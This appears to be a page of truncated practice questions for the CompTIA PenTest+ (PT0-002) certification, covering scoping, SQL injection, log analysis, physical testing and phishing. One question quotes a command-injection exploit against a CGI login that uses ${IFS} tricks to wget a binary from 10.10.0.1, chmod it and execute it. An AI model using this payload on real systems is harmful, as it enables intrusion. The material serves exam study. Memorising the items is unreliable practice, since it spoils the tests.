PT0-002 V3

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this...

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?A . Redact identifying information and provide a previous customer's documentation. B. Allow the client to only view the information while in secure spaces. C....

A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible. Which of the following remediation techniques would be the BEST to recommend? (Choose two.)A . Closing open services B. Encryption...

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....

A penetration tester is testing a new API for the company's existing services and is preparing the following script: Which of the following would the test discover?A . Default web configurations B. Open web ports on a host C. Supported HTTP methods D. Listening web servers in a domainView AnswerAnswer:...

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted? A. SQL injection B. HTML injection C. Remote command injection D. DLL injectionView AnswerAnswer:...

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support...

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?A . PLCs...

A penetration tester captured the following traffic during a web-application test: Which of the following methods should the tester use to visualize the authorization information being transmitted?A . Decode the authorization header using UTF-8. B. Decrypt the authorization header using bcrypt. C. Decode the authorization header using Base64. D. Decrypt...

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page...